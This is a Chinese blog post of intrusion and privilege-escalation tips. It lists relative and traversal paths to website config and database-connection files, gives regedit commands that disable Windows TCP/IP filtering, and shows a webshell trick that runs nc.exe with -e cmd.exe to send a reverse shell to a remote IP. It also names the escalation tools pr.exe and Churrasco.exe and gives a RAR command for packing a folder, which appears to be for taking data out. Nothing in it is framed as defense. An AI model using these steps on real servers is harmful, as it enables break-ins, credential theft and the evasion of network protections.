提权、***、经验、技巧总结大全四

原創 gaodi2002 2018-09-10 04:31

各种网站的配置文件相对路径大全:

/config.php
http://www.cnblogs.com/config.php
../config.php
http://www.cnblogs.com/../config.php
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/conn.php
./conn.php
http://www.cnblogs.com/conn.php
../conn.php
http://www.cnblogs.com/../conn.php
/conn.asp
./conn.asp
http://www.cnblogs.com/conn.asp
../conn.asp
http://www.cnblogs.com/../conn.asp
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/config/config.php
http://www.cnblogs.com/config/config.php
../config/config.php
http://www.cnblogs.com/../config/config.php
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/config/conn.php
./config/conn.php
http://www.cnblogs.com/config/conn.php
../config/conn.php
http://www.cnblogs.com/../config/conn.php
/config/conn.asp
./config/conn.asp
http://www.cnblogs.com/config/conn.asp
../config/conn.asp
http://www.cnblogs.com/../config/conn.asp
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/data/config.php
http://www.cnblogs.com/data/config.php
../data/config.php
http://www.cnblogs.com/../data/config.php
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/data/conn.php
./data/conn.php
http://www.cnblogs.com/data/conn.php
../data/conn.php
http://www.cnblogs.com/../data/conn.php
/data/conn.asp
./data/conn.asp
http://www.cnblogs.com/data/conn.asp
../data/conn.asp
http://www.cnblogs.com/../data/conn.asp
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/include/config.php
http://www.cnblogs.com/include/config.php
../include/config.php
http://www.cnblogs.com/../include/config.php
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/include/conn.php
./include/conn.php
http://www.cnblogs.com/include/conn.php
../include/conn.php
http://www.cnblogs.com/../include/conn.php
/include/conn.asp
./include/conn.asp
http://www.cnblogs.com/include/conn.asp
../include/conn.asp
http://www.cnblogs.com/../include/conn.asp
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/inc/config.php
http://www.cnblogs.com/inc/config.php
../inc/config.php
http://www.cnblogs.com/../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/inc/conn.php
./inc/conn.php
http://www.cnblogs.com/inc/conn.php
../inc/conn.php
http://www.cnblogs.com/../inc/conn.php
/inc/conn.asp
./inc/conn.asp
http://www.cnblogs.com/inc/conn.asp
../inc/conn.asp
http://www.cnblogs.com/../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/index.php
./index.php
http://www.cnblogs.com/index.php
../index.php
http://www.cnblogs.com/../index.php
/index.asp
./index.asp
http://www.cnblogs.com/index.asp
../index.asp
http://www.cnblogs.com/../index.asp
 
去除TCP IP筛选:

TCP/IP筛选在注册表里有三处,分别是:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用以下命令来导出注册表项:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然后再把三个文件里的:

“EnableSecurityFilters"=dword:00000001”

改为:

“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可:
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
 
Webshell 提权小技巧:

Cmd路径:c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入:c:\windows\temp\nc.exe

命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
 
命令行调用 RAR 打包:

rar a -k -r -s -m3 c:\1.rar c:\folder
 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

tomcat限制用域名访问 禁止 ip访问

張斌66 2019-02-23 13:44:28

新e时代网站

lichenjing9 2019-02-23 14:06:52

web网站服务2

曉晶 2019-02-23 13:58:27

虚拟机的使用和Linux的一些基础

夢與時光眠 2019-02-23 13:51:55

科技部网站是这样回答无聊问题的....

張富貴 2019-02-23 13:49:41

brew安装步骤

guoshuang_123 2019-02-23 13:43:55

MySQL性能优化的21个最佳实践

fdb2b 2019-02-23 14:01:03

如何将 .nk2 文件导入至 Outlook 2010

lingping 2019-02-23 14:05:54

yum源配置

Knight4NUI 2019-02-23 14:02:46

ubuntu下更改ip地址

lzwing 2019-02-23 13:57:24

MySQL的主主同步

夢與時光眠 2019-02-23 13:51:55

CentOS ifcfg-ethX 常用参数

zinejo 2019-02-23 13:50:36

Centos6.5 rsync同步备份

張斌66 2019-02-23 13:44:28

XP登录时提示“无法加载配置文件,找不到指定文件”

781732825 2019-02-23 13:43:04

centos上重要的一些配置文件(持续更新)

jijianzheng321 2019-02-23 13:42:18